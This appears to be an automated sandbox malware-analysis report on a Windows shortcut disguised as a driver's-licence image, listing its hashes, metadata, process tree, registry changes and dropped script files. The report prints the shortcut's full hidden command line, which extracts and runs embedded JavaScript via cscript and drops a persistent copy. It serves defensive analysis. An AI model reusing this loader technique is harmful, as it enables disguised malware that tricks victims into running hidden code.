analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Driv License Front.jpg.lnk

Full analysis: https://app.any.run/tasks/dfb2bac9-16a6-43f7-898c-85a2878d26ba
Verdict: Malicious activity
Analysis date: February 21, 2020, 16:42:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=2, Archive, ctime=Tue Feb 13 05:29:00 2018, mtime=Tue Feb 13 05:29:00 2018, atime=Tue Feb 13 05:29:00 2018, length=345088, window=hidenormalshowminimized
MD5:

EB4827EA9184AFA13229E023C5F7148E

SHA1:

7555DCA670F25E977A250F1B5E1F49A1FE933750

SHA256:

BA7EF37927323C30C09A35D97625B85F20CC504A39C7D3886859762E1C26E111

SSDEEP:

12288:nCrbIGrJnGcAZETsGb4VTbZXJbhmRMBjmE0qYf3YRHmWXQsA:nCrbzZGcASsGb4Vx5AYQuH70

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3976)
    • Creates files in the user directory

      • cscript.exe (PID: 272)
    • Executes scripts

      • cmd.exe (PID: 3976)
      • cscript.exe (PID: 2556)
      • cscript.exe (PID: 272)
    • Executed via COM

      • DllHost.exe (PID: 2464)
    • Application launched itself

      • cscript.exe (PID: 272)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, RelativePath, CommandArgs, IconFile, Unicode, NoLinkInfo, ExpIcon, [16], TargetMetadata
FileAttributes: Archive
CreateDate: 2018:02:13 07:29:00+01:00
AccessDate: 2018:02:13 07:29:00+01:00
ModifyDate: 2018:02:13 07:29:00+01:00
TargetFileSize: 345088
IconIndex: 2
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: -
RelativePath: ..\..\..\..\..\..\Windows\System32\cmd.exe
CommandLineArguments: /c path=%windir%\system32&&move "Driv License Front.jpg.lnk " "%tmp%\1.lnk"&forfiles /P "%tmp%" /M "Driv*.lnk" /S /D 0 /C "%comspec% /c move @path %tmp%\1.lnk"&type "%tmp%\1.lnk"|find "TRU4">"%tmp%\0.js"|rd a||cSCripT "%tmp%\0.js"
IconFileName: C:\Program Files\Windows NT\Accessories\wordpad.exe
MachineID: admin-pc
FillAttributes: 0x07
PopupFillAttributes: 0xf5
ScreenBufferSize: 1 x 1
WindowSize: 1 x 1
WindowOrigin: 65532 x 65532
FontSize: 8 x 12
FontFamily: Modern
FontWeight: 400
FontName: Terminal
CursorSize: 25
FullScreen: No
QuickEdit: No
InsertMode: Yes
WindowOriginAuto: No
HistoryBufferSize: 50
NumHistoryBuffers: 4
RemoveHistoryDuplicates: No
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
9
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs forfiles.exe no specs cmd.exe no specs find.exe no specs cmd.exe no specs cscript.exe no specs PhotoViewer.dll no specs cscript.exe no specs cscript.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3976"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Driv License Front.jpg.lnk " "C:\Users\admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "Driv*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk"&type "C:\Users\admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\admin\AppData\Local\Temp\0.js"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2656forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "Driv*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk"C:\Windows\system32\forfiles.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ForFiles - Executes a command on selected files
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4056C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\admin\AppData\Local\Temp\1.lnk""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3376find "TRU4"C:\Windows\system32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2548C:\Windows\system32\cmd.exe /S /D /c" rd a"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
272cSCripT "C:\Users\admin\AppData\Local\Temp\0.js"C:\Windows\system32\cscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2464C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2556"C:\Windows\System32\cscript.exe" C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.jsC:\Windows\System32\cscript.execscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.8.7600.16385
4020"C:\Windows\System32\cscript.exe" C:\Users\admin\AppData\Local\Temp\reportapi.jsC:\Windows\System32\cscript.execscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Version:
5.8.7600.16385
Total events
555
Read events
544
Write events
11
Delete events
0

Modification events

(PID) Process:(272) cscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{FFE2A43C-56B9-4BF5-9A79-CC6D4285608A} {00000122-0000-0000-C000-000000000046} 0xFFFF
Value:
01000000000000009452AEF7D5E8D501
(PID) Process:(272) cscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication
Operation:writeName:Name
Value:
cscript.exe
(PID) Process:(2464) DllHost.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication
Operation:writeName:Name
Value:
DllHost.exe
(PID) Process:(272) cscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(272) cscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2556) cscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2556) cscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
Executable files
0
Suspicious files
0
Text files
4
Unknown types
1

Dropped files

PID
Process
Filename
Type
272cscript.exeC:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.jstext
MD5:C881308B66759F4A3DCCC1D2F1A741C0
SHA256:A28445BE606336C46569D26AA34FD373960B3AF437FB84F68382E2A1BE386A3B
3376find.exeC:\Users\admin\AppData\Local\Temp\0.jstext
MD5:C881308B66759F4A3DCCC1D2F1A741C0
SHA256:A28445BE606336C46569D26AA34FD373960B3AF437FB84F68382E2A1BE386A3B
2556cscript.exeC:\Users\admin\AppData\Local\Temp\reportapi.jstext
MD5:C881308B66759F4A3DCCC1D2F1A741C0
SHA256:A28445BE606336C46569D26AA34FD373960B3AF437FB84F68382E2A1BE386A3B
272cscript.exeC:\Users\admin\AppData\Local\Temp\Driv License Front.jpgimage
MD5:8C23A1186E4ABAFE934832C7C581067C
SHA256:47512C1B6FF5144C15FC8473CD24994EFB74EEA9AB0387CB3BCB6B726D683773
3976cmd.exeC:\Users\admin\AppData\Local\Temp\1.lnklnk
MD5:EB4827EA9184AFA13229E023C5F7148E
SHA256:BA7EF37927323C30C09A35D97625B85F20CC504A39C7D3886859762E1C26E111
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info